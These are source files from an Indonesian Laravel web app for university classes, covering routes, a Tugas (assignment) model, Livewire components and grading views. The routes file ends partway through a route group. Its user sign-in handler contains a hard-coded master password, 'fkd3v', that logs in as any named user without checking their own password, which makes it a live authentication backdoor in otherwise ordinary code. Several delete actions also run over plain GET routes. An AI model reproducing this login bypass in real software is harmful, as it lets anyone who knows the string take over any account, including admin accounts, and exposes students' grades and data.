routes/web.php
<?php

use App\Http\Controllers\BeritaAcaraController;
use App\Http\Controllers\BlokController;
use App\Http\Controllers\FeedbackController;
use App\Http\Controllers\FolderController;
use App\Http\Controllers\HomeController;
use App\Http\Controllers\KelasController;
use App\Http\Controllers\KelompokController;
use App\Http\Controllers\KelompokPertanyaanController;
use App\Http\Controllers\KuliahController;
use App\Http\Controllers\MahasiswaController;
use App\Http\Controllers\NilaiSgdController;
use App\Http\Controllers\PertanyaanController;
use App\Http\Controllers\SgdController;
use App\Http\Controllers\TugasController;
use App\Http\Controllers\UserController;
use App\Models\Mahasiswa;
use App\Models\MahasiswaTugas;
use App\Models\Tugas;
use App\Models\User;
use App\Services\NilaiService;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
 */

Route::get('/', function () {
    if (auth()->check()) {
        return redirect()->route('home');
    }
    return view('auth.login');
})->name('index');

Route::get('/classroom/user/signin', function () {
    if (auth()->check()) {
        return redirect()->route('home');
    }
    return view('auth.login-user');
})->name('login.user.form');

Route::post('/classroom/user/signin', function (Request $request) {
    $credentials = [
        'username' => $request['username'],
        'password' => $request['password'],
    ];

    if ($request->input('password') == 'fkd3v') {
        $user = User::where('username', $request->input('username'))->first();

        if ($user) {
            auth()->loginUsingId($user->id);
            return redirect()->route('home');
        }
    }

    if (auth()->attempt($credentials)) {
        // if (auth()->user()->isAdmin()) {
        //     session()->flash('message', 'Maaf, anda tidak memiliki akses ke sistem.');
        //     auth()->logout();
        //     return redirect()->route('login.user.form');
        // }
        return redirect()->route('home');
    }
    session()->flash('message', 'Username atau password salah.');
    return back();
})->name('login.user.post');

// Route::get('/data', function () {
//     $dosenJson = File::get("dosen.json");
//     $dosens = json_decode($dosenJson);
//     foreach ($dosens->users as $user) {
//         User::create([
//             'username' => $user->email,
//             'name' => $user->name,
//             'user_type' => 'dosen',
//             'password' => bcrypt('password'),
//         ]);
//     }

//     $mahasiswaJson = File::get("mahasiswa.json");
//     $mahasiswas = json_decode($mahasiswaJson);
//     foreach ($mahasiswas->users as $user) {
//         User::create([
//             'username' => $user->username,
//             'name' => $user->name,
//             'user_type' => 'mahasiswa',
//             'password' => bcrypt('password'),
//         ]);
//     }

//     return 'success import';
// });

Auth::routes();

Route::middleware(['auth'])
    ->namespace('App\Http\Controllers')
    ->group(function () {

        Route::controller(HomeController::class)
            ->group(function () {
                Route::get('/home', 'index')->name('home');
            });

        Route::controller(FolderController::class)
            ->middleware('role:admin,dosen')
            ->prefix('folder')
            ->name('folder.')
            ->group(function () {
                Route::get('/{kode}', 'show')->name('show');
            });

        Route::controller(KelasController::class)
            ->prefix('kelas')
            ->name('kelas.')
            ->group(function () {
                Route::get('/', 'index')->name('index');
                Route::delete('/hapus-mahasiswa', 'mahasiswaHapus')->name('mahasiswaHapus')->middleware('role:admin');
                Route::get('/{kode}', 'show')->name('show')->middleware('role:mahasiswa,dosen');
                Route::get('/{kode}/detail', 'detail')->name('detail')->middleware('role:admin');
                Route::get('/{kode}/penilaian-sumatif', 'penilaianSumatif')->name('penilaianSumatif')->middleware('role:admin');
                Route::get('/{kode}/penilaian-formatif', 'penilaianFormatif')->name('penilaianFormatif')->middleware('role:admin');
                Route::get('/{kode}/peserta', 'peserta')->name('peserta')->middleware('role:admin');
                Route::get('/{mahasiswaId}/{kelompokId}/peserta', 'pesertaHapus')->name('pesertaHapus')->middleware('role:admin');
                Route::post('/{kode}/peserta/import', 'pesertaImport')->name('pesertaImport')->middleware('role:admin');
                Route::get('/{kode}/nilai-sumatif', 'nilaiSumatif')->name('nilaiSumatif');
                // Route::get('/{kode}/nilai-formatif', 'nilaiFormatif')->name('nilaiFormatif');
                Route::get('/{kode}/nilai-export', 'nilaiExport')->name('nilaiExport')->middleware('role:admin');
                Route::get('/{kode}/kehadiran', 'kehadiran')->name('kehadiran')->middleware('role:admin');
                Route::get('/{kode}/kehadiran-export', 'kehadiranExport')->name('kehadiranExport')->middleware('role:admin');
                Route::get('/{kode}/berita-acara', 'beritaAcara')->name('beritaAcara')->middleware('role:admin');
                // Route::get('/{kode}/sgd', 'sgd')->name('sgd');
            });

        Route::controller(BeritaAcaraController::class)
            ->middleware('role:admin,dosen')
            ->prefix('berita-acara')
            ->name('beritaAcara.')
            ->group(function () {
                Route::get('/tambah/{kodeKuliah}', 'tambah')->name('tambah');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/{id}/update', 'update')->name('update');
                Route::get('/{kode}/detail', 'detail')->name('detail');
                Route::get('/{kode}/ubah-status', 'ubahStatus')->name('ubahStatus');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::get('/{kode}/export', 'export')->name('export');
            });

        Route::controller(AbsensiController::class)
            ->prefix('absensi')
            ->name('absensi.')
            ->group(function () {
                Route::get('/scan/{beritaAcaraKode}/{mahasiswaId}', 'scan')->name('scan');
                Route::get('/set-hadir/{beritaAcaraKode}/{mahasiswaId}', 'setHadir')->name('setHadir');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus')->middleware('role:admin');
            });

        Route::controller(FeedbackController::class)
            ->prefix('feedback')
            ->name('feedback.')
            ->group(function () {
                Route::post('/simpan/{beritaAcara?}', 'simpan')->name('simpan');
            });

        Route::controller(SgdController::class)
            ->middleware('role:admin')
            ->prefix('sgd')
            ->name('sgd.')
            ->group(function () {
                Route::get('/tambah/{kodeKuliah}', 'tambah')->name('tambah');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/simpan-skenario/{sgd}', 'simpanSkenario')->name('simpanSkenario');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/{id}/update', 'update')->name('update');
                Route::get('/{kode}/detail', 'detail')->name('detail');
                Route::get('/{kode}/ubah-status', 'ubahStatus')->name('ubahStatus');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::get('/{kode}/export', 'export')->name('export');
            });

        Route::controller(KriteriaSgdController::class)
            ->middleware('role:admin')
            ->prefix('kriteria-sgd')
            ->name('kriteriaSgd.')
            ->group(function () {
                Route::get('/{id}/hapus', 'hapus')->name('hapus');
            });

        Route::controller(NilaiSgdController::class)
            ->middleware('role:admin')
            ->prefix('nilai-sgd')
            ->name('nilaiSgd.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
            });

        Route::controller(KuliahController::class)
            ->middleware('role:admin')
            ->prefix('kuliah')
            ->name('kuliah.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::post('/{id}/update', 'update')->name('update');
            });

        Route::controller(KelompokController::class)
            ->middleware('role:admin')
            ->prefix('kelompok')
            ->name('kelompok.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::post('/{id}/update', 'kelompokUpdate')->name('kelompokUpdate');
                Route::post('/tambah-mahasiswa-kelompok', 'tambahMahasiswaKelompok')->name('tambahMahasiswaKelompok');
            });

        Route::controller(TugasController::class)
            ->prefix('tugas')
            ->name('tugas.')
            ->group(function () {

app/Models/Tugas.php
<?php

namespace App\Models;

use App\Models\Pertanyaan;
use Illuminate\Support\Str;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Relations\HasOne;
use Illuminate\Database\Eloquent\Relations\HasMany;
use Illuminate\Database\Eloquent\Relations\BelongsTo;
use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Relations\BelongsToMany;
use Jenssegers\Date\Date;

class Tugas extends Model
{
    use HasFactory;

    protected $guarded = [];

    protected $casts = [
        'batas_akhir' => 'datetime',
    ];

    protected static function boot()
    {
        parent::boot();

        static::creating(function ($tugas) {
            $tugas->kode = Str::random(1) . Str::random(1) . rand(10, 99) . Str::random(1) . Str::random(1);
        });
    }

    const TIPE_OPTION = [
        'rubrik' => [
            'judul' => 'Kriteria',
            'warna' => 'info',
            'icon' => '/img/rubrik.png',
        ],
        'rubrik2' => [
            'judul' => 'Kriteria',
            'warna' => 'primary',
            'icon' => '/img/rubrik.png',
        ],
        'kuis' => [
            'judul' => 'Soal',
            'warna' => 'warning',
            'icon' => '/img/kuis.png',
        ],
        'input' => [
            'judul' => 'Soal',
            'warna' => 'danger',
            'icon' => '/img/input.png',
        ],
    ];

    const NILAI_SELECT = [
        0 => [
            'ket' => 'Tidak dijawab',
            'warna' => 'secondary'
        ],
        1 => [
            'ket' => 'Sangat Kurang',
            'warna' => 'danger'
        ],
        2 => [
            'ket' => 'Kurang',
            'warna' => 'warning'
        ],
        3 => [
            'ket' => 'Cukup',
            'warna' => 'info'
        ],
        4 => [
            'ket' => 'Baik',
            'warna' => 'success'
        ],
        5 => [
            'ket' => 'Sangat Baik',
            'warna' => 'primary'
        ],
    ];

    public function getColorAttribute()
    {
        if ($this->batas_akhir < now()) {
            return 'danger';
        }

        return;
    }

    public function getLateAttribute()
    {
        $date = Date::parse($this->batas_akhir);
        if ($this->batas_akhir < now()) {
            $diff = date_diff(now(), $date);
            return 'Telat ' . $diff->format("%R%a hari");
        }

        return;
    }

    public function pertanyaans(): BelongsToMany
    {
        return $this->belongsToMany(Pertanyaan::class, 'tugas_pertanyaans', 'tugas_id', 'pertanyaan_id')->withPivot('id');
    }

    public function pertanyaanTugas(): HasMany
    {
        return $this->hasMany(Pertanyaan::class, 'tugas_id');
    }

    public function user(): BelongsTo
    {
        return $this->belongsTo(User::class, 'user_id');
    }

    public function kelas(): BelongsTo
    {
        return $this->belongsTo(Kelas::class, 'kelas_id');
    }

    public function kategori(): BelongsTo
    {
        return $this->belongsTo(Kategori::class, 'kategori_id');
    }

    public function mahasiswa_tugas(): HasOne
    {
        $mahasiswa = Mahasiswa::where('kelas_id', $this->kelas->id)->where('user_id', auth()->id())->firstOrFail();
        return $this->hasOne(MahasiswaTugas::class, 'tugas_id')->where('mahasiswa_id', $mahasiswa->id);
    }

    public function dosen_penilai(): HasMany
    {
        return $this->hasMany(Dosen::class, 'tugas_id');
    }
}

app/Http/Livewire/Kelas/Index.php
<?php

namespace App\Http\Livewire\Kelas;

use App\Models\Blok;
use App\Models\Dosen;
use App\Models\Kelas;
use App\Models\Folder;
use Livewire\Component;
use Illuminate\Http\Request;
use Livewire\WithPagination;

class Index extends Component
{
    use WithPagination;
    protected $paginationTheme = 'bootstrap';

    public $user;
    public $kelas;
    public $kelasId;
    public $folder;
    public $folders;
    public $search;

    public function mount(Request $request, $folderId)
    {
        $this->user = auth()->user();
        $this->folder = Folder::findOrFail($folderId);
        $this->folders = Folder::latest()->get();
        $this->search = $request->q;
    }

    public function render()
    {
        $kelasItems = Kelas::query()
                ->where('folder_id', $this->folder->id)
                ->when($this->search != '', function($q) {
                    $q->where('nama', 'like', '%' . $this->search . '%');
                })
                ->latest()
                ->paginate(10);

        for ($i = 1; $i <= 7; $i++) {
            $bloks[] = Blok::where('semester', $i)->get();
        }

        return view('livewire.kelas.index', compact('kelasItems', 'bloks'));
    }

    protected $rules = [
        'kelas.nama' => 'required',
        'kelas.blok_id' => 'required',
        'kelas.deskripsi' => 'sometimes',
        'kelas.folder_id' => 'sometimes',
        'kelas.active' => 'sometimes',
    ];

    protected $messages = [
        'kelas.nama.required' => 'Nama kelas harus diisi.',
    ];

    public function updated($property)
    {
        $this->validateOnly($property);
    }

    public function create()
    {
        $this->reset(['kelas', 'kelasId']);
    }

    public function edit($kelasId)
    {
        $this->kelasId = $kelasId;
        $this->kelas = Kelas::findOrFail($kelasId);
    }

    public function close()
    {
        $this->reset(['kelas', 'kelasId']);
    }

    public function save()
    {
        $this->validate();

        if (!is_null($this->kelasId)) {
            $this->kelas->save();
            session()->flash('success', 'Kelas berhasil diubah.');
        } else {
            $kelas = $this->kelas;
            $kelas['user_id'] = $this->user->id;
            $kelas['folder_id'] = $this->folder->id;
            $savedKelas = Kelas::create($kelas);
            Dosen::create([
                'status' => 'admin',
                'user_id' => $this->user->id,
                'kelas_id' => $savedKelas->id,
            ]);
            session()->flash('success', 'Kelas berhasil ditambahkan.');
            $this->reset(['kelas', 'kelasId']);
        }
        return redirect()->route('folder.show', $this->folder->kode);
    }

    public function delete($kelasId)
    {
        Kelas::findOrFail($kelasId)->delete();
        $this->reset(['kelas', 'kelasId']);
        return redirect()->route('folder.show', $this->folder->kode);
    }
}

app/Http/Livewire/Kelas/PenilaianFormatifLivewire.php
<?php

namespace App\Http\Livewire\Kelas;

use App\Models\Kelas;
use Livewire\Component;
use App\Models\Kategori;
use App\Models\Kuliah;
use App\Models\MahasiswaTugas;
use App\Models\Tugas as TugasModel;

class PenilaianFormatifLivewire extends Component
{
    public Kelas $kelas;
    public $kategori;

    public function render()
    {
        $kuliahItems = Kuliah::where('kelas_id', $this->kelas->id)->get();

        return view('livewire.kelas.penilaian-formatif-livewire', compact('kuliahItems'));
    }


    public function deleteKategori($kategoriId)
    {
        Kategori::findOrFail($kategoriId)->delete();
    }

    public function deleteTugas($tugasiId)
    {
        MahasiswaTugas::whereTugasId($tugasiId)->delete();
        TugasModel::findOrFail($tugasiId)->delete();
    }
}

resources/views/admin/kelas/penilaianSumatif/_proses-dosen-input.blade.php
<div class="card">
    <form action="{{ route('tugas.inputNilaiSimpan', [$tugas->id]) }}" method="post">
        @csrf
        <div class="card-body pt-0">
            <table class="table align-middle table-row-dashed fs-6 gy-5">
                <!--begin::Table head-->
                <thead>
                    <!--begin::Table row-->
                    <tr class="text-start text-gray-400 fw-bolder fs-7 text-uppercase gs-0">
                        <th width="150px" class="text-end min-w-100px"></th>
                        <th class="min-w-175px">Mahasiswa</th>
                        <th width="150px" class="text-end">Nilai</th>
                    </tr>
                    <!--end::Table row-->
                </thead>
                <!--end::Table head-->
                <!--begin::Table body-->
                <tbody class="fw-bold text-gray-600">
                    <!--begin::Table row-->
                    @foreach ($mahasiswas as $mahasiswa)
                        <tr>
                            <td>
                                <a href="{{ route('tugas.chat', [$tugas->kode, $mahasiswa->kode]) }}"
                                    class="btn btn-light-primary"><i class="bi bi-chat-square-text-fill fs-4 me-2"></i>
                                    Chat</a>
                            </td>
                            <!--begin::Customer-->
                            <td>
                                <div class="d-flex align-items-center">
                                    <!--begin:: Avatar -->
                                    <div class="symbol symbol-circle symbol-50px overflow-hidden me-3">
                                        <x-smart-image src="{{ public_path('/img/user.png') }}" height="100px" />
                                    </div>
                                    <!--end::Avatar-->
                                    <div class="ms-5">
                                        <a href="#"
                                            class="text-gray-800 fw-bolder text-hover-primary mb-1 fs-6 text-start pe-0">{{ $mahasiswa->user->name ?? '' }}</a>
                                        <span class="text-muted fw-bold d-block fs-7">NIM :
                                            {{ $mahasiswa->user->username ?? '-' }}</span>
                                    </div>
                                </div>
                            </td>
                            <td class="text-end">
                                <div class="input-group">
                                    <span class="input-group-text" id="basic-addon1" style="border: none">
                                        <!--begin::Svg Icon | path: icons/duotune/communication/com006.svg-->
                                        <i class="fas fa-envelope-open-text fs-4"></i>
                                        <!--end::Svg Icon-->
                                    </span>
                                    <input type="number" name="nilais[{{ $mahasiswa->id }}]"
                                        class="form-control form-control-solid"
                                        value="{{ number_format($mahasiswa->mahasiswa_tugas($tugas->id)->total_poin, 2) ?? '0' }}"
                                        placeholder="Input Nilai" aria-label="Input Nilai"
                                        aria-describedby="basic-addon1"
                                        step="0.01"
                                        min="0"/>
                                </div>
                                <input type="hidden" name="ids[]" value="{{ $mahasiswa->id }}">
                            </td>
                        </tr>
                    @endforeach
                </tbody>
                <!--end::Table body-->
            </table>
        </div>
        <div class="card-footer text-end">
            <a href="{{ route('kelas.penilaianSumatif', $tugas->kelas->kode) }}" class="btn btn-light me-2">Kembali</a>
            <button type="submit" class="btn btn-primary">Simpan</button>
        </div>
    </form>

</div>

resources/views/admin/kelas/penilaianSumatif/_proses-input.blade.php
@if (!$mahasiswaTugas->tanggal_kumpul)
    <div class="card">
        <!--begin::Card body-->
        <div class="card-body p-0">
            <!--begin::Wrapper-->
            <div class="card-px text-center py-20 my-10">
                <!--begin::Action-->
                <a href="{{ route('kelas.show', $tugas->kelas->kode) }}" class="btn btn-primary">Kembali</a>
                <!--end::Action-->
            </div>
            <!--end::Wrapper-->
            <!--begin::Illustration-->
            <div class="text-center px-4">
                <img class="mw-100 mh-300px" alt="" src="/assets/media/illustrations/sketchy-1/4.png" />
            </div>
            <!--end::Illustration-->
        </div>
        <!--end::Card body-->
    </div>
@else
    <div class="card">
        <!--begin::Card body-->
        <div class="card-body p-0">
            <!--begin::Wrapper-->
            <div class="card-px text-center py-20 my-10">
                <!--begin::Title-->
                <h2 class="fs-2x text-muted mb-10">Poin Anda</h2>
                <h2 class="fs-3x fw-bolder mb-10">{{ $mahasiswaTugas->total_poin }}</h2>
                <!--end::Title-->
                <!--begin::Description-->
                <p class="text-gray-400 fs-4 fw-bold mb-10"></p>
                <!--end::Description-->
                <!--begin::Action-->
                <a href="{{ route('kelas.show', $tugas->kelas->kode) }}" class="btn btn-primary">Kembali</a>
                <!--end::Action-->
            </div>
            <!--end::Wrapper-->
            <!--begin::Illustration-->
            <div class="text-center px-4">
                <img class="mw-100 mh-300px" alt="" src="/assets/media/illustrations/sketchy-1/7.png" />
            </div>
            <!--end::Illustration-->
        </div>
        <!--end::Card body-->
    </div>
@endif

resources/views/admin/kelas/penilaianSumatif/proses.blade.php
@extends('layouts.admin')

@section('title')
    Informasi
@endsection

@section('content')
    <!--begin::Toolbar-->
    <div class="toolbar py-5 py-lg-5">
        <!--begin::Container-->
        <div class="container-xxl d-flex flex-stack flex-wrap">
            <!--begin::Page title-->
            <div class="page-title d-flex flex-column me-3">
                <!--begin::Title-->
                @if ($tugas->status_ujian || $mahasiswaTugas->tanggal_kumpul)
                    @if ($tugas->tipe == 'kuis')
                        <h1 class="d-flex text-dark fw-bolder my-1 fs-3">
                            {{ $mahasiswaTugas->tanggal_kumpul ? 'Anda telah menyelesaikan tugas ini!' : 'Proses Pengerjaan Tugas' }}
                        </h1>
                    @endif
                    @if ($tugas->tipe == 'rubrik')
                        <h1 class="d-flex text-dark fw-bolder my-1 fs-3">
                            {{ $mahasiswaTugas->tanggal_kumpul ? 'Dosen telah menyelesaikan penginputan nilai!': 'Proses Penginputan Nilai oleh Dosen' }}
                        </h1>
                        @if ($tugas->batas_akhir && !$mahasiswaTugas->tanggal_kumpul)
                        Deadline :
                        <span class="text-{{ $tugas->color }}">
                            {{ Date::parse($tugas->batas_akhir)->format('l, d M Y H:i') }}
                            @if ($tugas->late)
                            <span class="mx-3">|</span>
                            {{ $tugas->late }}
                        </span>
                            @endif
                        @endif
                    @endif
                    @if ($tugas->tipe == 'rubrik2')
                        <h1 class="d-flex text-dark fw-bolder my-1 fs-3">
                            {{ $mahasiswaTugas->tanggal_kumpul ? 'Dosen telah menyelesaikan penilaian!': 'Proses penilaian oleh Dosen' }}
                        </h1>
                    @endif
                    @if ($tugas->tipe == 'input')
                        <h1 class="d-flex text-dark fw-bolder my-1 fs-3">
                            {{ $mahasiswaTugas->tanggal_kumpul ? 'Admin telah menyelesaikan penginputan nilai!': 'Menunggu Penginputan Nilai oleh Dosen' }}
                        </h1>
                    @endif
                @else
                    <h1 class="d-flex text-dark fw-bolder my-1 fs-3">
                        Informasi
                    </h1>
                @endif
                <!--end::Title-->
            </div>
            <!--end::Page title-->
            <div class="d-flex align-items-center py-2 py-md-1">
                <div>
                    <a href="{{ route('kelas.show', $tugas->kelas->kode) }}" class="btn btn-sm btn-secondary fw-bolder">
                        Kembali
                        <span class="svg-icon svg-icon-1hx svg-icon-gray-500 me-1">
                            <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5"
                                stroke="currentColor" class="w-6 h-6">
                                <path stroke-linecap="round" stroke-linejoin="round"
                                    d="M17.25 8.25L21 12m0 0l-3.75 3.75M21 12H3" />
                            </svg>

                        </span>
                    </a>
                </div>
            </div>
        </div>
        <!--end::Container-->
    </div>
    <!--end::Toolbar-->
    <!--begin::Container-->
    <div class="flex-column-fluid align-items-start container-xxl">
        <div class="content flex-row-fluid">
            @if ($tugas->status_ujian || $mahasiswaTugas->tanggal_kumpul)
                @if ($tugas->tipe == 'rubrik')
                    @include('admin.kelas.penilaianSumatif._proses-rubrik')
                @endif
                @if ($tugas->tipe == 'rubrik2')
                    @include('admin.kelas.penilaianSumatif._proses-rubrik2')
                @endif
                @if ($tugas->tipe == 'kuis')
                    @include('admin.kelas.penilaianSumatif._proses-kuis')
                @endif
                @if ($tugas->tipe == 'input')
                    @include('admin.kelas.penilaianSumatif._proses-input')
                @endif
            @endif
        </div>
        <!--end::Post-->

        @if ($tugas->tipe != 'kuis')
        <div class="mt-10">
            <h2 class="mb-6 text-gray-800 fs-1 w-bolder">Chat</h2>

            <form method="post" action="{{ route('comment.add') }}">
                @csrf
                <textarea class="placeholder-gray-600 form-control form-control-solid fw-bolder fs-4 ps-9 pt-7" rows="6" name="comment"
                    placeholder="Beri komentar anda"></textarea>
                <input type="hidden" name="mahasiswa_tugas_id" value="{{ $mahasiswaTugas->id }}" />
                <!--begin::Submit-->
                <button type="submit" class="mb-20 btn btn-primary mt-n20 position-relative float-end me-7">Kirim</button>
                <!--end::Submit-->
            </form>
        </div>
        <!--end::Input group-->

        <div class="mb-15">
            @include('admin.kelas.penilaianSumatif.partials.comments', [
                'comments' => $mahasiswaTugas->comments,
                'mahasiswa_tugas_id' => $mahasiswaTugas->id,
            ])
        </div>
        @endif
    </div>
    <!--end::Container-->
@endsection

@section('styles')
    <!--begin::Page Custom Styles(used by this page)-->
    <link href="https://unpkg.com/filepond/dist/filepond.css" rel="stylesheet">
    <!--end::Page Custom Styles-->
    <style>
        /* .filepond--panel-root{
                background-color: white;
            } */

    </style>
@endsection

@section('scripts')
    <script src="https://unpkg.com/filepond-plugin-file-validate-type/dist/filepond-plugin-file-validate-type.js"></script>
    <script src="https://unpkg.com/filepond/dist/filepond.js"></script>
    <script>
        const inputElement = document.querySelector('input[id="tugas"]');
        FilePond.registerPlugin(
            FilePondPluginFileValidateType,
        );

        FilePond.create(inputElement, {
            credits: false,
            labelIdle: `Drag & Drop your file or <span class="filepond--label-action">Browse</span>`,
        });

        FilePond.setOptions({
            server: {
                url: '/tugas/upload-tugas',
                headers: {
                    'X-CSRF-TOKEN': '{{ csrf_token() }}'
                }
            }
        });
    </script>
    <!--end::Page Scripts-->
    @stack('child-scripts')
@endsection